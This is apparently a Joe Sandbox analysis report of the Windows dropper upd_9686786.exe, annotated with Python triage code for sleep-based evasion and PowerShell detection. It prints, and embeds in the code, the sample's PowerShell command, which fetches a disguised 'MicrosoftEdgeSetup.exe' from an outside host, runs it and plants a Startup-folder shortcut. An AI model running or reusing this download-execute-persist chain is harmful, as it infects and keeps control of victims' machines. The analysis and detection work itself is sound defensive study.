Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E651896 rdtsc 0_2_00007FF76E651896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\upd_9686786.exe Window / User API: threadDelayed 9708
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9909
Source: C:\Users\user\Desktop\upd_9686786.exe Window / User API: threadDelayed 9732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9885
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep count: 291 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep time: -291000s >= -30000s
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep count: 9708 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep time: -9708000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 Thread sleep count: 9909 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep count: 267 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep time: -267000s >= -30000s
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep count: 9732 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep time: -9732000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780 Thread sleep count: 9885 > 30
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: upd_9686786.exe, 00000000.00000002.34844256149.0000022A3F3A5000.00000004.00000020.00020000.00000000.sdmp, upd_9686786.exe, 00000008.00000002.34844597358.0000012EDC445000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: upd_9686786.exe, 00000000.00000002.34844538698.0000022A3F5D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.30008936621.0000016F75159000.00000004.00000020.00020000.00000000.sdmp, upd_9686786.exe, 00000008.00000002.34844471247.0000012EDC1E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E651896 rdtsc 0_2_00007FF76E651896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
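Two different things are mixed into the sleep evidence above. The sample's own threads (TIDs 5008 and 8516) make thousands of sleep calls whose total divides evenly by the call count, which is the fixed-interval stalling loop the "May sleep (evasive loops)" signature refers to. The powershell.exe entries with 922337203685477 are something else: that number is Int64.MaxValue in 100-ns ticks expressed in milliseconds (about 29,000 years), a wait-forever timeout rather than a timed delay, and it should not be read as the sample's evasion. The Python below is an added triage helper written for this page, not Joe Sandbox code and not from the sample; it parses the report's sleep lines as printed, pairs each thread's count and time observations in order of appearance, and labels each thread accordingly. The sample lines are copied from the report; totals stay in the report's own raw unit.

```python
"""Aggregate the 'Thread sleep' lines of a Joe Sandbox behaviour listing per thread.

Added example by the editor (not Joe Sandbox code, not the sample's). It pairs each
thread's sleep-count line with its sleep-time line and separates a genuine stalling
loop (many calls, fixed per-call delay) from the wait-forever value 922337203685477,
which is Int64.MaxValue in 100-ns ticks expressed in milliseconds. The sentinel check
does not depend on the unit the report prints.
"""
import re
from collections import OrderedDict
from typing import List, Tuple

INFINITE_SENTINEL = (2 ** 63 - 1) // 10_000   # 922337203685477

SLEEP_RE = re.compile(
    r"Source:\s*(?P<src>\S+)\s*TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>count|time):\s*(?P<val>-?\d+)")

# Lines copied from the report above (one space between fields).
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep count: 291 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep time: -291000s >= -30000s
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep count: 9708 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep time: -9708000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 Thread sleep count: 9909 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep count: 267 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep time: -267000s >= -30000s
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep count: 9732 > 30
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep time: -9732000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780 Thread sleep count: 9885 > 30
""".strip().splitlines()


class ThreadSleep:
    """Sleep observations for one (process image, thread id) pair."""

    def __init__(self) -> None:
        self.counts: List[int] = []   # from "Thread sleep count: N > 30"
        self.times: List[int] = []    # from "Thread sleep time: -Ts >= -30000s", stored as |T|

    @property
    def infinite(self) -> bool:
        return any(t >= INFINITE_SENTINEL for t in self.times)

    @property
    def finite_total(self) -> int:
        return sum(t for t in self.times if t < INFINITE_SENTINEL)

    @property
    def per_call(self) -> List[float]:
        """Raw delay per call for each (count, time) pair; a constant value means a fixed-interval loop."""
        return [t / c for c, t in zip(self.counts, self.times) if c and t < INFINITE_SENTINEL]


def parse(lines: List[str]) -> "OrderedDict[Tuple[str, int], ThreadSleep]":
    threads: "OrderedDict[Tuple[str, int], ThreadSleep]" = OrderedDict()
    for line in lines:
        m = SLEEP_RE.search(line)
        if not m:
            continue
        key = (m["src"], int(m["tid"]))
        rec = threads.setdefault(key, ThreadSleep())
        value = abs(int(m["val"]))   # negative = relative interval (NT convention)
        (rec.counts if m["kind"] == "count" else rec.times).append(value)
    return threads


def classify(rec: ThreadSleep) -> str:
    if rec.infinite:
        return "wait-forever sentinel"
    if rec.per_call and max(rec.counts) > 30:
        return "stalling loop"
    if rec.counts:
        return "many sleep calls, duration not reported"
    return "no evidence"


def summarize(lines: List[str]) -> List[Tuple[str, int, str, int]]:
    """(image name, tid, classification, finite total in the report's raw unit) per thread."""
    return [(src.rsplit("\\", 1)[-1], tid, classify(rec), rec.finite_total)
            for (src, tid), rec in parse(lines).items()]


if __name__ == "__main__":
    for row in summarize(SAMPLE_LINES):
        print(row)
```

Run on the copied lines, the two sample threads come out as fixed 1000-unit-per-call loops (291 and 9708 calls on TID 5008, 267 and 9732 on TID 8516), while powershell.exe TID 8228 is classified as the wait-forever sentinel and contributes nothing to the finite total.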
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"
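The PowerShell command line above is the whole chain in one -Command string: Invoke-WebRequest pulls a second stage from apple-online.shop into %TMP% under the name of the Microsoft Edge installer, the call operator (&) runs it, and WScript.Shell then writes tuygh.lnk into the per-user Start Menu\Programs\Startup folder with TargetPath set to the sample's own Desktop path. What relaunches at logon is therefore the original dropper from wherever it was first run, not the downloaded binary, and the persistence breaks if that file is moved. The report also prints a lowercased copy of the same line, so any matching has to be case-insensitive. The Python below is an added example written for this page, not Joe Sandbox's code and not the sample's: it scores PowerShell launch records against the three behaviours the report's Sigma rules name (web download cmdlet, execution out of a user-writable path, Startup-folder shortcut persistence) and resolves the shortcut target through the $programPath assignment. REPORT_CMDLINE is the command line printed above; the benign and admin records and all PIDs are constructed.

```python
"""Score PowerShell command lines for the download / execute / persist chain in this report.

Added example by the editor: not Joe Sandbox code and not the sample's own code. It
re-implements, over plain strings, the logic behind the report's Sigma hits and
resolves the .lnk target the way the sample's command line builds it. REPORT_CMDLINE
is copied from the report; the other records and every PID are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Cmdlets, aliases and .NET calls commonly used as download cradles.
DOWNLOAD_RE = re.compile(
    r"\b(invoke-webrequest|iwr|wget|curl|invoke-restmethod|irm|start-bitstransfer)\b"
    r"|\.download(file|string|data)\(", re.I)
URL_RE = re.compile(r"""https?://[^\s"'\\;)]+""", re.I)
STARTUP_RE = re.compile(r"start menu\\programs\\startup", re.I)
# Call operator on a path under a user-writable environment variable, e.g. & "$env:TMP/x.exe"
EXEC_USER_WRITABLE_RE = re.compile(
    r"""&\s*\\?"?\$env:(tmp|temp|appdata|localappdata|userprofile)[/\\]([^\s"\\]+)""", re.I)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")                    # $name = 'literal'
TARGET_RE = re.compile(r"\.targetpath\s*=\s*(?:\$(\w+)|'([^']*)')", re.I)
USER_WRITABLE_DIRS = ("\\users\\", "\\temp\\", "\\tmp\\", "\\appdata\\", "\\programdata\\")


@dataclass
class Verdict:
    findings: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    staged_binary: Optional[str] = None     # what the call operator executes
    shortcut_target: Optional[str] = None   # .lnk TargetPath, i.e. what runs at logon
    shortcut_name: Optional[str] = None

    @property
    def score(self) -> int:
        return len(self.findings)


def resolve_shortcut_target(cmdline: str) -> Optional[str]:
    """Return the .lnk TargetPath, following one $variable = 'literal' indirection."""
    m = TARGET_RE.search(cmdline)
    if not m:
        return None
    var, literal = m.groups()
    if literal is not None:
        return literal
    assignments = {name.lower(): value for name, value in ASSIGN_RE.findall(cmdline)}
    return assignments.get(var.lower())


def analyze_cmdline(cmdline: str) -> Verdict:
    """Apply the rules case-insensitively; the report shows the same line lowercased too."""
    v = Verdict()
    if DOWNLOAD_RE.search(cmdline):
        v.findings.append("powershell_web_download")
        v.urls = URL_RE.findall(cmdline)
    m = EXEC_USER_WRITABLE_RE.search(cmdline)
    if m:
        v.findings.append("exec_from_user_writable_path")
        v.staged_binary = f"$env:{m.group(1)}/{m.group(2)}"
    if (STARTUP_RE.search(cmdline) and re.search(r"wscript\.shell", cmdline, re.I)
            and re.search(r"\.createshortcut\(", cmdline, re.I)):
        v.findings.append("startup_shortcut_persistence")
        v.shortcut_target = resolve_shortcut_target(cmdline)
        lnks = [val for _, val in ASSIGN_RE.findall(cmdline) if val.lower().endswith(".lnk")]
        v.shortcut_name = lnks[0] if lnks else None
        if v.shortcut_target and any(d in v.shortcut_target.lower() for d in USER_WRITABLE_DIRS):
            v.findings.append("persistence_target_in_user_writable_path")
    if {"powershell_web_download", "exec_from_user_writable_path",
            "startup_shortcut_persistence"} <= set(v.findings):
        v.findings.append("chain:download_execute_persist")
    return v


def triage(records: List[Dict[str, object]]) -> List[Tuple[int, Verdict]]:
    """Return (pid, verdict) for PowerShell launches with at least one hit, worst first."""
    hits = []
    for r in records:
        if not str(r["image"]).lower().endswith("powershell.exe"):
            continue
        v = analyze_cmdline(str(r["cmdline"]))
        if v.score:
            hits.append((int(r["pid"]), v))
    return sorted(hits, key=lambda h: h[1].score, reverse=True)


# Command line as printed in the report (it appears there lowercased as well).
REPORT_CMDLINE = r'''powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"'''
# Constructed records for contrast; the PIDs are made up.
BENIGN_CMDLINE = r'''powershell.exe -NoProfile -Command "Get-ChildItem 'C:\Program Files' | Measure-Object"'''
ADMIN_CMDLINE = r'''powershell.exe -Command "Invoke-WebRequest -Uri https://updates.example.test/agent.msi -OutFile C:\ProgramData\agent.msi"'''
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RECORDS = [
    {"pid": 1111, "image": PS_IMAGE, "cmdline": BENIGN_CMDLINE},
    {"pid": 2222, "image": PS_IMAGE, "cmdline": ADMIN_CMDLINE},
    {"pid": 4001, "image": PS_IMAGE, "cmdline": REPORT_CMDLINE},
    {"pid": 5555, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c systeminfo"},
]

if __name__ == "__main__":
    for pid, v in triage(RECORDS):
        print(pid, v.score, v.findings, v.urls, v.staged_binary, v.shortcut_target, v.shortcut_name)
```

On the report's line this yields all five findings, the single URL, the staged path $env:TMP/MicrosoftEdgeSetup.exe, the target C:\Users\user\Desktop\upd_9686786.exe and the shortcut name tuygh.lnk; the constructed admin download scores one (a download alone is not the chain) and the benign listing scores zero. The lowercased copy produces the same findings, which is the property a production rule needs.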
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
MITRE ATT&CK Matrix (techniques listed per tactic; numeric markers kept as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (121); Command and Scripting Interpreter (1); PowerShell (2); Cron; Launchd; Scheduled Task
Persistence: Registry Run Keys / Startup Folder (12); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (12); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (121); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (23)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1523560 | Sample: upd_9686786.exe | Start date: 01/10/2024 | Architecture: WINDOWS | Score: 60

Start
  Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
  Sigma detected: Suspicious Invoke-WebRequest Execution
  started: upd_9686786.exe
    DNS/IP: 65.38.120.47 SRS-6-Z-7381US United States
    DNS/IP: 217.148.142.19 PROFESIONALHOSTINGES Romania
    DNS/IP: 65.109.226.176 ALABANZA-BALTUS United States
    Suspicious powershell command line found
    started: powershell.exe
      DNS/IP: 172.67.178.253 CLOUDFLARENETUS United States
      dropped: C:\Users\user\AppData\Roaming\...\tuygh.lnk, MS
      Powershell creates an autostart link
      started: conhost.exe
    started: cmd.exe
      started: systeminfo.exe
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      started: conhost.exe
  started: upd_9686786.exe
    started: cmd.exe
      started: systeminfo.exe
      started: conhost.exe
    started: powershell.exe
      started: conhost.exe
No Antivirus matches
No contacted domains info
IP | Domain | Country | ASN | ASN Name | Malicious
65.38.120.47 | unknown | United States | 7381 | SRS-6-Z-7381US | false
217.148.142.19 | unknown | Romania | 200960 | PROFESIONALHOSTINGES | false
172.67.178.253 | unknown | United States | 13335 | CLOUDFLARENETUS | false
65.109.226.176 | unknown | United States | 11022 | ALABANZA-BALTUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523560
Start date and time: 2024-10-01 19:17:33 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 15m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: upd_9686786.exe
Detection: MAL
Classification: mal60.evad.winEXE@18/6@0/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 19
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
• Execution Graph export aborted for target powershell.exe, PID 816 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found
• Skipping network analysis since the amount of network traffic is too extensive
• VT rate limit hit for: upd_9686786.exe
Time | Type | Description
13:20:24 | API Interceptor | 47228x Sleep call for process: upd_9686786.exe modified
19:19:52 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Match | Associated Sample Name / URL | Detection | Threat Name
65.38.120.47 | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown
65.38.120.47 | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown
65.38.120.47 | upd_1416836.exe | malicious | Unknown
65.38.120.47 | upd_8816295.exe | malicious | Unknown
65.38.120.47 | upd_1416836.exe | malicious | Unknown
65.38.120.47 | upd_8816295.exe | malicious | Unknown
65.38.120.47 | upd_4299382.exe | malicious | Unknown
217.148.142.19 | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown
217.148.142.19 | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown
217.148.142.19 | upd_1416836.exe | malicious | Unknown
217.148.142.19 | upd_8816295.exe | malicious | Unknown
217.148.142.19 | upd_1416836.exe | malicious | Unknown
